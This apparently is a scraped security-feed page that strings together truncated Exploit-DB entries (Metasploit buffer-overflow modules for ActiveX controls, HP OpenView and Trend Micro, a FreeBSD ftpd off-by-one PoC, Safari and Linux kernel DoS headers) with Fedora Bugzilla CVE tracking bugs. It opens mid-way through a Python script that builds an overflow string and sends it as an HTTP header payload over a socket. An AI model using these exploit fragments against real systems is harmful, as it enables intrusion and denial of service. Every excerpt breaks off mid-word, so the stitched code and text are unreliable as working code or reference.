string += "B"*4 #controlling eax
string += "C"*500
header = "Content-Length"
print "starting the attack for:", ips
print ""
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
connect=s.connect((ips, port))
except:
print "no connection possible"
sys.exit(1)
print "\r\nsending payload"
print "..."
payload = (
'GET http://%s/ HTTP/1.0\r\n'
'%s: %
Exploit-DB
Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-06-15
CVE-2008-1724 Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)
Tumbleweed SecureTransport FileTransfer - 'vcst_eu.dll' ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: tumbleweed_filetransfer.rb 9525 2010-06-15 07:18:08Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in the vcst_eu.dll
FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed
SecureTransport suite. By sending an overly long string to the
TransferFile() 'remotefile' function, a
Exploit-DB
Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow (Metasploit)
exploitdb·2010-06-11
CVE-2008-0550 Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow (Metasploit)
Streamcast 0.9.75 - HTTP User-Agent Buffer Overflow (Metasploit)
---
##
# $Id: steamcast_useragent.rb 9488 2010-06-11 16:12:05Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Streamcast %q{
This module exploits a stack buffer overflow in Streamcast [
'LSO ', # Original exploit module
'patrick' # Added references and check code. Default target to XP.
],
'License' => BSD_LICENSE,
'Version' => '$Revision: 9488 $',
'References' =>
[
[ 'CVE', '2008-0550' ],
[ 'OSVDB', '42670' ],
[ 'URL', 'http://aluigi.altervista.org/adv/steamcazz-adv.
Exploit-DB
FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)
exploitdb·2010-05-27·CVSS 9.3
CVE-2010-1938 [CRITICAL] FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)
FreeBSD 8.0 - 'ftpd' (FreeBSD-SA-10:05) Off-By-One (PoC)
---
# FreeBSD 8.0 ftpd off-by one PoC (FreeBSD-SA-10:05)
# CVE-2010-1938
# FreeBSD-SA-10:05
# Credit: Maksymilian Arciemowicz and Adam Zabrocki
#
# http://securityreason.com/achievement_securityalert/87
# http://security.freebsd.org/advisories/FreeBSD-SA-10:05.opie.asc
# http://blog.pi3.com.pl/?p=111
#
PoC:
Connected to localhost.
Escape character is '^]'.
220 127.cx FTP server (Version 6.00LS) ready.
user cx
331 Password required for cx.
user AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Connection closed by foreign host.
- --
Best Regards,
- ------------------------
pub 1024D/A6986BD6 2008-08-22
uid Maksymilian Arciemowicz (cxib)
sub 4096g/0889FA9A 2008-08-22
http://securityreason.com
http://securityreason.com/key/Arciemowicz.Maksy
Exploit-DB
HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-0067 HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)
HP OpenView Network Node Manager (OV NNM) - 'Toolbar.exe' CGI Buffer Overflow (Metasploit)
---
##
# $Id: hp_nnm_toolbar.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'HP OpenView Network Node Manager Toolbar.exe CGI Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in HP OpenView Network Node Manager 7.50.
By sending a specially crafted CGI request to Toolbar.exe, an attacker may be able to execute
arbitrary code.
},
'Author' => [ 'MC' ],
'License' => MSF_LICENSE,
'Vers
Exploit-DB
Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-0955 Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
Creative Software AutoUpdate Engine - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: creative_software_cachefolder.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Creative Software AutoUpdate Engine. When
sending an overly long string to the cachefolder() property of CTSUEng.ocx
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE
Exploit-DB
iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-4384 iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow (Metasploit)
iseemedia / Roxio / MGI Software LPViewer - ActiveX Control Buffer Overflow (Metasploit)
---
##
# $Id: lpviewer_url.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in LPViewer ActiveX control (LPControll.dll 3.2.0.2). When
sending an overly long string to the URL() property an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' =>
Exploit-DB
Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)
exploitdb·2010-05-09
CVE-2008-1365 Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)
Trend Micro OfficeScan - Remote Stack Buffer Overflow (Metasploit)
---
##
# $Id: trendmicro_officescan.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'metasm'
class Metasploit3 'Trend Micro OfficeScan Remote Stack Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Trend Micro OfficeScan
cgiChkMasterPwd.exe (running with SYSTEM privileges).
},
'Author' => [ 'toto' ],
'License' => MSF_LICENSE,
'Version' => '$Revision: 9262 $',
'References' =>
[
[ 'CVE', '2008-1365' ],
[ 'OSVDB', '
Exploit-DB
Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit)
exploitdb·2010-05-09
CVE-2008-3008 Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit)
Microsoft Windows Media Encoder 9 - 'wmex.dll' ActiveX Buffer Overflow (MS08-053) (Metasploit)
---
##
# $Id: ms08_053_mediaencoder.rb 9262 2010-05-09 17:45:00Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 'Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow',
'Description' => %q{
This module exploits a stack buffer overflow in Windows Media Encoder 9. When
sending an overly long string to the GetDetailsString() method of wmex.dll
an attacker may be able to execute arbitrary code.
},
'License' => MSF_LICENSE,
'Author' => [ 'MC
Exploit-DB
Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)
exploitdb·2010-04-30
CVE-2008-0015 Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)
Microsoft DirectShow - 'msvidctl.dll' MPEG-2 Memory Corruption (MS09-032/MS09-037) (Metasploit)
---
##
# $Id: msvidctl_mpeg2.rb 9179 2010-04-30 08:40:19Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
##
# msvidctl_mpeg2.rb
#
# Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption exploit for the Metasploit Framework
#
# Tested successfully on the following platforms (fully patched 06/07/09):
# - Internet Explorer 6, Windows XP SP2
# - Internet Explorer 7, Windows XP SP3
#
# Original exploit was found in-the-wild used to preform drive-by attacks via compromised C
Exploit-DB
Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)
exploitdb·2009-01-01
CVE-2008-5821 Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)
Apple Safari 3.2 WebKit - 'alink' Property Memory Leak Remote Denial of Service (1)
---
source: https://www.securityfocus.com/bid/33080/info
Apple Safari is prone to a denial-of-service vulnerability that resides in the WebKit library.
Remote attackers can exploit this issue to crash the affected browser, denial-of-service condition.
Apple Safari 3.2 running on Microsoft Windows Vista is vulnerable; other versions running on different platforms may also be affected.
Note (December 20, 2010): Safari on iOS 4.0.1 is also vulnerable.
#!/usr/bin/perl
# safari_webkit_ml.pl
# Safari (Webkit) 3.2 Remote Memory Leak Exploit
# Jeremy Brown [[email protected]/jbrownsec.blogspot.com]
# Access violation when writing to [00000018]
# EIP 6B00A02B WebKit.6B00A02B
# LastError 00000008 ERROR_NOT_
Exploit-DB
Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service
exploitdb·2008-07-31
CVE-2010-0437 Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service
Linux Kernel 2.6.x - 'net/ipv6/ip6_output.c' Null Pointer Dereference Denial of Service
---
/*
source: https://www.securityfocus.com/bid/38185/info
The Linux kernel is prone to a local denial-of-service vulnerability.
Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.
*/
/* gcc -std=gnu99 -O2 -g -lpthread -lrt tunload.c -o tunload */
/*****************************************************************************
* Copyright (C) 2008 Remi Denis-Courmont. All rights reserved. *
* *
* Redistribution and use in source and binary forms, with or without *
* modification, are permitted provided that the above copyright notice
Bugzilla
CVE-2008-7270 openssl: NETSCAPE_REUSE_CIPHER_CHANGE_BUG downgrade-to-disabled ciphersuite attack
bugzilla·2010-12-07·CVSS 4.3
CVE-2008-7270 [MEDIUM] CVE-2008-7270 openssl: NETSCAPE_REUSE_CIPHER_CHANGE_BUG downgrade-to-disabled ciphersuite attack
CVE-2008-7270 openssl: NETSCAPE_REUSE_CIPHER_CHANGE_BUG downgrade-to-disabled ciphersuite attack
Common Vulnerabilities and Exposures assigned an identifier CVE-2008-7270 to
the following vulnerability:
OpenSSL before 0.9.8j, when SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG is enabled, does not prevent modification of the ciphersuite in the session cache, which allows remote attackers to force the use of a disabled cipher via vectors involving sniffing network traffic to discover a session identifier, a different vulnerability than CVE-2010-4180.
References:
http://cvs.openssl.org/chngview?cn=17489
https://bugzilla.redhat.com/show_bug.cgi?id=659462
Discussion:
(In reply to comment #0)
> a different vulnerability than CVE-2010-4180.
While CVE description lists these vulnerabilities as dif
Bugzilla
CVE-2010-2008 mysql: remote authenticated DoS via ALTER DATABASE [fedora-all]
bugzilla·2010-07-13·CVSS 3.5
CVE-2010-2008 [LOW] CVE-2010-2008 mysql: remote authenticated DoS via ALTER DATABASE [fedora-all]
CVE-2010-2008 mysql: remote authenticated DoS via ALTER DATABASE [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=614214
Please note: this issue affects multi
Bugzilla
CVE-2010-2008 mysql: remote authenticated DoS via ALTER DATABASE
bugzilla·2010-07-13·CVSS 3.5
CVE-2010-2008 [LOW] CVE-2010-2008 mysql: remote authenticated DoS via ALTER DATABASE
CVE-2010-2008 mysql: remote authenticated DoS via ALTER DATABASE
Common Vulnerabilities and Exposures assigned an identifier CVE-2010-2008 to
the following vulnerability:
Name: CVE-2010-2008
URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-2008
Assigned: 20100521
Reference: CONFIRM: http://bugs.mysql.com/bug.php?id=53804
Reference: CONFIRM: http://dev.mysql.com/doc/refman/5.1/en/news-5-1-48.html
Reference: BID:41198
Reference: URL: http://www.securityfocus.com/bid/41198
Reference: SECTRACK:1024160
Reference: URL: http://www.securitytracker.com/id?1024160
Reference: SECUNIA:40333
Reference: URL: http://secunia.com/advisories/40333
MySQL before 5.1.48 allows remote authenticated users with alter
database privileges to cause a denial of service (server crash and
database loss) v
Bugzilla
CVE-2008-4437 CVE-2008-6098, CVE-2009-048[13456] bugzilla: multiple issues [F10]
bugzilla·2009-02-09·CVSS 7.1
CVE-2008-4437 [HIGH] CVE-2008-4437 CVE-2008-6098, CVE-2009-048[13456] bugzilla: multiple issues [F10]
CVE-2008-4437 CVE-2008-6098, CVE-2009-048[13456] bugzilla: multiple issues [F10]
F10 tracking bug: see blocks bug list for full details of the security issue(s).
[bug automatically created by: add-tracking-bugs]
Discussion:
You can eventually use the following link to create the update request:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&release=Fedora%2010&bugs=484756,
---
Correct update submission URL is:
https://admin.fedoraproject.org/updates/new/?request=Stable&type_=security&bugs=484756,CVE-2008-6098,CVE-2009-0481,CVE-2009-0482,CVE-2009-0483,CVE-2009-0484,CVE-2009-0485,CVE-2009-0486
---
*** Bug 465959 has been marked as a duplicate of this bug. ***
---
CVE-2008-4437 fixed in upstream 3.0.5 is still unfixed too, adding it to this tracking bug
http://bugs.mysql.com/bug.php?id=53804http://dev.mysql.com/doc/refman/5.1/en/news-5-1-48.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-July/044546.htmlhttp://secunia.com/advisories/40333http://secunia.com/advisories/40762http://www.mandriva.com/security/advisories?name=MDVSA-2010:155http://www.securityfocus.com/bid/41198http://www.securitytracker.com/id?1024160http://www.ubuntu.com/usn/USN-1017-1http://www.ubuntu.com/usn/USN-1397-1http://www.vupen.com/english/advisories/2010/1918https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11869http://bugs.mysql.com/bug.php?id=53804http://dev.mysql.com/doc/refman/5.1/en/news-5-1-48.htmlhttp://lists.fedoraproject.org/pipermail/package-announce/2010-July/044546.htmlhttp://secunia.com/advisories/40333http://secunia.com/advisories/40762http://www.mandriva.com/security/advisories?name=MDVSA-2010:155http://www.securityfocus.com/bid/41198http://www.securitytracker.com/id?1024160http://www.ubuntu.com/usn/USN-1017-1http://www.ubuntu.com/usn/USN-1397-1http://www.vupen.com/english/advisories/2010/1918https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A11869
2010-07-13
Published